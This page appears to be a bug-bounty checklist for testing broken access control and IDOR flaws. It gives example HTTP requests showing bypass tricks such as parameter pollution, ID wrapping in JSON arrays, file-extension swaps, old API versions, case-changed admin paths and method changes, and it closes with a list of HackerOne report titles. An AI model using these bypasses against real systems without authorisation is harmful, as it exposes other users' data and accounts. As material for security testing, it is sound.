Broken Access Control
Play with Request / Response
Excessive Data Exposure
Broken Function Level Authorization
Mass Assignment
Enumerate object properties
Improper Assets Management
Checklist
IDOR Checklist
GET /api_v1/messages ->200GET /api_v1/messages?user_id=victim_uuid ->200
GET /api_v1/messages?user_id=attacker_id&user_id=victim_idGET /api_v1/messages?user_id=victim_id&user_id=attacker_id
GET /user_data/2341 -> 401GET /user_data/2341.json -> 200GET /user_data/2341.xml -> 200GET /user_data/2341.config -> 200GET /user_data/2341.txt -> 200
{"userid":1234,"userid":2542}
{"userid":123} ->401{"userid":[123]} ->200
{"userid":123} ->401{"userid":{"userid":123}} ->200
GET /v3/users_data/1234 ->401GET /v1/users_data/1234 ->200
GET /GetUser/dmljdGltQG1haWwuY29t
[...]
change HTTP method
GET /users/delete/victim_id ->403
POST /users/delete/victim_id ->200
Try replacing parameter names
Instead of this:
GET /api/albums?album_id=<album id>
Try This:
GET /api/albums?account_id=<account id>
Tip: There is a Burp extension called Paramalyzer which will help with this by remembering all the parameters you have passed to a host.
Path Traversal
POST /users/delete/victim_id ->403
POST /users/delete/my_id/..victim_id ->200
change request content-type
Content-Type: application/xml ->
Content-Type: application/json
swap non-numeric with numeric id
GET /file?id=90djbkdbkdbd29dd
GET /file?id=302
Missing Function Level Acess Control
GET /admin/profile ->401
GET /Admin/profile ->200
GET /ADMIN/profile ->200
GET /aDmin/profile ->200
GET /adMin/profile ->200
GET /admIn/profile ->200
GET /admiN/profile ->200
send wildcard instead of an id
GET /api/users/user_id ->
GET /api/users/*
Never ignore encoded/hashed ID
for hashed ID ,create multiple accounts and understand the ppattern application users to allot an iD
Google Dorking/public form
search all the endpoints having ID which the search engine may have already indexed
Bruteforce Hidden HTTP parameters
use tools like arjun , paramminer
Bypass object level authorization Add parameter onto the endpoit if not present by defualt
GET /api_v1/messages ->200
GET /api_v1/messages?user_id=victim_uuid ->200
HTTP Parameter POllution Give mult value for same parameter
GET /api_v1/messages?user_id=attacker_id&user_id=victim_id
GET /api_v1/messages?user_id=victim_id&user_id=attacker_id
change file type
GET /user_data/2341 -> 401
GET /user_data/2341.json -> 200
GET /user_data/2341.xml -> 200
GET /user_data/2341.config -> 200
GET /user_data/2341.txt -> 200
json parameter pollution
{"userid":1234,"userid":2542}
Wrap the ID with an array in the body
{"userid":123} ->401
{"userid":[123]} ->200
wrap the id with a json object
{"userid":123} ->401
{"userid":{"userid":123}} ->200
Test an outdata API version
GET /v3/users_data/1234 ->401
GET /v1/users_data/1234 ->200
If the website using graphql, try to find IDOR using graphql!
GET /graphql
[...]
GET /graphql.php?query=
[...]
Authorization Bypass reports from HackerOne:
[Part II] Email Confirmation Bypass in myshop.myshopify.com that Leads to Full Privilege Escalation to Shopify - 872 upvotes, $0
Ability to reset password for account to Upserve - 602 upvotes, $0
Request smuggling on admin-official.line.me could lead to account takeover to LINE - 554 upvotes, $0
Privilege Escalation From user to SYSTEM via unauthenticated command execution to Ubiquiti Inc. - 540 upvotes, $0
Email Confirmation Bypass in your-store.myshopify.com which leads to privilege escalation to Shopify - 533 upvotes, $0
Able to Become Admin for Any LINE Official Account to LINE - 485 upvotes, $0
H1514 Ability to MiTM Shopify PoS Session to Takeover Communications to Shopify - 362 upvotes, $13337
Attacker is able to access commit title and team member comments which are supposed to be private to GitLab - 337 upvotes, $0
[Razer Pay Mobile App] Broken access control allowing other user's bank account to be deleted to Razer - 311 upvotes, $1000
Shopify admin authentication bypass using partners.shopify.com to Shopify - 290 upvotes, $20000
Oracle Webcenter Sites administrative and hi-privilege access available directly from the internet (/cs/Satellite) to LocalTapiola - 261 upvotes, $18000
Team member with Program permission only can escalate to Admin permission to HackerOne - 257 upvotes, $2500
Linux privilege escalation via trusted $PATH in keybase-redirector to Keybase - 245 upvotes, $5000
Ability to bypass partner email confirmation to take over any store given an employee email to Shopify - 230 upvotes, $15250
Privilege escalation from any user (including external) to gitlab admin when admin impersonates you to GitLab - 230 upvotes, $0
Ability to bypass email verification for OAuth grants results in accounts takeovers on 3rd parties to GitLab - 223 upvotes, $3000
Unauthenticated blind SSRF in OAuth Jira authorization controller to GitLab - 222 upvotes, $4000
[www.zomato.com] Blind XSS on one of the Admin Dashboard to Zomato - 213 upvotes, $750
Ability to DOS any organization's SSO and open up the door to account takeovers to Grammarly - 212 upvotes, $10500
Ability To Delete User(s) Account Without User Interaction to GitLab - 211 upvotes, $0
Privilege escalation in workers container to Semmle - 202 upvotes, $1500
Incorrect authorization to the intelbot service leading to ticket information to TikTok - 201 upvotes, $15000
Admin Management - Login Using Default Password - Leads to Image Upload Backdoor/Shell to Razer - 199 upvotes, $200
Ability to create own account UUID leads to stored XSS to Upserve - 198 upvotes, $1500
Unauthorized access to βββββββββ.com allows access to Uber Brazil tax documents and system. to Uber - 196 upvotes, $4500
HackerOne Jira integration plugin Leaked JWT to unauthorized jira users to HackerOne - 193 upvotes, $3000
Stealing Users OAuth authorization code via redirect_uri to pixiv - 183 upvotes, $2000
Unauthorized access to metadata of undisclosed reports that were retested to HackerOne - 180 upvotes, $0
IDOR to add secondary users in www.paypal.com/businessmanage/users/api/v1/users to PayPal - 694 upvotes, $10500
IDOR allow access to payments data of any user to Nord Security - 337 upvotes, $0
Insecure Direct Object Reference (IDOR) - Delete Campaigns to HackerOne - 280 upvotes, $0
idor allows you to delete photos and album from a gallery to Pornhub - 266 upvotes, $1500
IDOR allows any user to edit others videos to Pornhub - 246 upvotes, $1500
Singapore - Account Takeover via IDOR to Starbucks - 221 upvotes, $0
IDOR delete any Tickets on ads.tiktok.com to TikTok - 193 upvotes, $0
I.D.O.R To Order,Book,Buy,reserve On YELP FOR FREE (UNAUTHORIZED USE OF OTHER USER'S CREDIT CARD) to Yelp - 181 upvotes, $0
IDOR when editing users leads to Account Takeover without User Interaction at CrowdSignal to Automattic - 178 upvotes, $0
An IDOR that can lead to enumeration of a user and disclosure of email and phone number within cashier to Unikrn - 167 upvotes, $3000
IDOR allows an attacker to modify the links of any user to Reddit - 159 upvotes, $5000
IDOR in the https://market.semrush.com/ to Semrush - 155 upvotes, $0
IDOR leads to Edit Anyone's Blogs / Websites to Automattic - 144 upvotes, $0
[api.pandao.ru] IDOR for order delivery address to Mail.ru - 120 upvotes, $3000
IDOR vulnerability (Price manipulation) to Acronis - 119 upvotes, $0
Getting access of mod logs from any public or restricted subreddit with IDOR vulnerability to Reddit - 115 upvotes, $5000
IDOR and statistics leakage in Orders to X (Formerly Twitter) - 110 upvotes, $289
IDOR in https://3d.cs.money/ to CS Money - 110 upvotes, $0
IDOR leading to downloading of any attachment to BCM Messenger - 105 upvotes, $0
IDOR leads to leak analytics of any restaurant to Uber - 103 upvotes, $2000
Last updated
Was this helpful?